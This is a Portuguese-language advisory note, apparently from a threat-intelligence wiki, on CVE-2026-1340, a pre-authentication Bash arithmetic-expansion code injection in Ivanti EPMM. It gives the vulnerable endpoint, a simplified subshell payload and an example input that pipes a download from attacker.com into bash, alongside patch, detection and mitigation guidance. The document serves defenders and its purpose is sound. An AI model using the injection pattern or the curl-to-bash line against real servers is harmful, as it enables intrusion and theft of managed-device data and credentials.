# CVE-2026-1340 - Ivanti EPMM Code Injection RCE Pré-Autenticado (CVSS 9.8)
> [!critical] CVSS 9.8 - Injeção de código via expansão aritmética Bash no Ivanti EPMM (MDM). RCE sem autenticação, PoC público disponível, exploração ativa confirmada. Patch obrigatório: security update 0S-4/0L-4 de 29 de janeiro de 2026.
## Visão Geral
O **CVE-2026-1340** é uma vulnerabilidade crítica de injeção de código (CWE-94) no [[_ivanti|Ivanti]] Endpoint Manager Mobile (EPMM), solução de MDM amplamente utilizada para gerenciamento de smartphones e tablets corporativos em grandes organizações e ambientes governamentais. A falha explora um comportamento inesperado da expansão aritmética do Bash — atacantes remotos não autenticados podem injetar comandos nos endpoints do servidor EPMM, obtendo controle total do sistema. A Watchtowr Labs analisou a vulnerabilidade em profundidade e públicou PoC funcional em janeiro de 2026. A Ivanti lançou os security updates 0S-4 e 0L-4 em 29 de janeiro de 2026.
O Ivanti EPMM armazena e gerencia políticas, credenciais de integração (Active Directory, Exchange) e informações de todos os dispositivos móveis da organização. O comprometimento do servidor MDM equivale ao acesso potencial a todos os endpoints móveis gerenciados. A vulnerabilidade foi frequentemente mencionada em conjunto com [[cve-2026-1281|CVE-2026-1281]] (outra RCE pré-auth do EPMM listada no CISA KEV) — ambas devem ser patcheadas simultaneamente. O EPSS de 92% (97° percentil) indica altíssima probabilidade de exploração.
**CVE-2026-1340** é uma vulnerabilidade crítica de **injeção de código** (CWE-94) no **[[Ivanti Endpoint Manager Mobile (EPMM)]]**, solução de gerenciamento de dispositivos móveis (MDM) amplamente utilizada em ambientes corporativos e governamentais. A falha explora expansão aritmética do Bash em endpoints específicos, permitindo que um atacante remoto não autenticado execute comandos arbitrários no servidor EPMM.
A vulnerabilidade foi analisada em profundidade pela Watchtowr Labs, que públicou análise técnica detalhada. Um PoC funcional está públicamente disponível. A Ivanti lançou patch de segurança em **29 de janeiro de 2026** (security update 0S-4 e 0L-4).
**Pontuação de risco:**
- CVSS v3.1: **9.8** (Crítico)
- EPSS: **~92%** - 97° percentil
- PoC público: **disponível** (Watchtowr Labs, Unit 42)
- Exploração ativa: **confirmada** - comprometimentos limitados pré-patch
> [!warning] CVE-2026-1340 é frequentemente mencionada em conjunto com **[[cve-2026-1281|CVE-2026-1281]]** (outra RCE pré-auth do EPMM, CVE relacionada no CISA KEV). Ambas devem ser patcheadas simultaneamente.
## Resumo Técnico
```mermaid
graph TB
A["🔍 CVE-2026-1340 · CVSS 9.8<br/>Ivanti EPMM - Code Injection"] --> B["🎯 Localizar EPMM Exposto<br/>Endpoint MDM acessível<br/>/mifs/c/appstore/fob/"]
B --> C["💥 Bash Arithmetic Injection<br/>Expansão aritmética do Bash<br/>sem autenticação necessária"]
C --> D["🔧 RCE no Servidor MDM<br/>Comandos no servidor Ivanti<br/>EPMM comprometido"]
D --> E["🔧 Acesso a Todos os Devices<br/>MDM controla smartphones<br/>e dispositivos corporativos"]
E --> F["💀 Comprometimento de Frota MDM<br/>Acesso a e-mails, configs<br/>dados de todos os endpoints"]
classDef critical fill:#c92a2a,stroke:#c92a2a,color:#fff
classDef exploit fill:#e67700,stroke:#e67700,color:#fff
classDef postexploit fill:#495057,stroke:#343a40,color:#fff
classDef impact fill:#1864ab,stroke:#1864ab,color:#fff
class A critical
class B,C exploit
class D,E postexploit
class F impact
```
## Exploração
A vulnerabilidade explora como o Ivanti EPMM processa parâmetros de requisições HTTP em endpoints específicos. Parâmetros fornecidos pelo usuário são passados para o shell Bash via contexto de expansão aritmética (`$((expressão))`). Por meio de injeção de subshell (`$(comando)`), um atacante pode executar comandos arbitrários no contexto do processo do servidor.
**Endpoint vulnerável exemplo:**
```
/mifs/c/appstore/fob/
```
**Payload de exemplo (simplificado):**
```
GET /mifs/c/appstore/fob/?param=$(comando_malicioso)
```
A Watchtowr Labs resumiu o bug como: "Someone knows Bash far too well" - referindo-se à exploração do comportamento inesperado da expansão aritmética do Bash.
**Análise técnica:**
1. Parâmetro HTTP é interpolado em contexto de expansão aritmética: `$((user_input))`
2. A entrada `$(curl attacker.com|bash)` é avaliada como subshell dentro da expansão aritmética
3. O comando do atacante é executado com os privilégios do processo do servidor EPMM
4. Não requer autenticação - endpoint acessível públicamente
**Atividade pós-exploração observada:**
- Instalação de webshells para persistência
- Comprometimentos limitados confirmados pelo Ivanti antes do patch
- Unit 42 documentou tentativas de exploração em produção
## Impacto
- **RCE sem autenticação:** controle completo do servidor EPMM
- **Acesso ao banco de dados MDM:** informações sobre todos os dispositivos gerenciados (IMEI, usuários, aplicativos instalados, configurações)
- **Comprometimento de políticas MDM:** possibilidade de enviar perfis maliciosos para dispositivos gerenciados
- **Acesso a credenciais:** o EPMM armazena credenciais de integração com Active Directory, Exchange e outros sistemas
**Impacto LATAM/Brasil:**
Ivanti EPMM é usado em grandes organizações brasileiras para gerenciamento de smartphones e tablets corporativos. Comprometimento do servidor MDM implica acesso potencial a dados de todos os dispositivos móveis gerenciados da organização.
## Mitigação
**Patch obrigatório:**
- **Security Update 0S-4** (on-premises, série 0S)
- **Security Update 0L-4** (on-premises, série 0L)
- Data de lançamento: **29 de janeiro de 2026**
- Advisory: [hub.ivanti.com - CVE-2026-1281/CVE-2026-1340](https://hub.ivanti.com/s/article/Security-Advisory-Ivanti-Endpoint-Manager-Mobile-EPMM-CVE-2026-1281-CVE-2026-1340)
**Verificação de versão:**
Confirmar que a versão instalada inclui o security update 0S-4 ou 0L-4 ou posterior via interface de administração do EPMM.
**Mitigações adicionais:**
- Restringir acesso ao servidor EPMM por IP - apenas administradores de rede
- Monitorar logs de acesso para requisições com caracteres suspeitos nos parâmetros (`
, `(`, `)`, backtick)
- Revisar webshells e arquivos recentemente criados nos diretórios do EPMM
- Inspecionar processos filhos inesperados do servidor EPMM
## Notas Relacionadas
**CVE relacionada (mesmo produto, no CISA KEV):** [[cve-2026-1281|CVE-2026-1281]]
**CVE Ivanti EPM relacionada:** [[cve-2026-1603|CVE-2026-1603]] - Ivanti EPM auth bypass (produto diferente)
**TTPs relacionadas:** [[t1190-exploit-public-facing-application|T1190 - Exploit Public-Facing Application]] · [[t1505-003-web-shell|T1505.003 - Web Shell]] · [[t1059-command-scripting-interpreter|T1059.004 - Unix Shell]] · [[t1078-valid-accounts|T1078 - Valid Accounts]]
**Setores em risco:** [[government]] · [[healthcare|saúde]] · [[financial]] · [[telecomunicações]]
> [!latam] O Ivanti EPMM é usado em grandes corporações e órgãos governamentais brasileiros para gerenciamento de dispositivos móveis corporativos. Comprometimentos limitados foram confirmados antes do patch. Organizações no Brasil devem verificar imediatamente a versão instalada e aplicar os security updates 0S-4 ou 0L-4. Adicionalmente, auditar logs de acesso para requisições contendo caracteres de expansão de shell nos parâmetros.
## Mitigações Adicionais
- [[m1051-update-software|M1051 - Update Software]] - Aplicar security update 0S-4 ou 0L-4 do Ivanti EPMM
- [[m1035-limit-access-to-resource-over-network|M1035 - Limit Access to Resource Over Network]] - Restringir acesso ao servidor EPMM por IP de administração
- [[m1031-network-intrusion-prevention|M1031 - Network Intrusion Prevention]] - Monitorar parâmetros HTTP com caracteres de expansão de shell ($, (, ), backtick)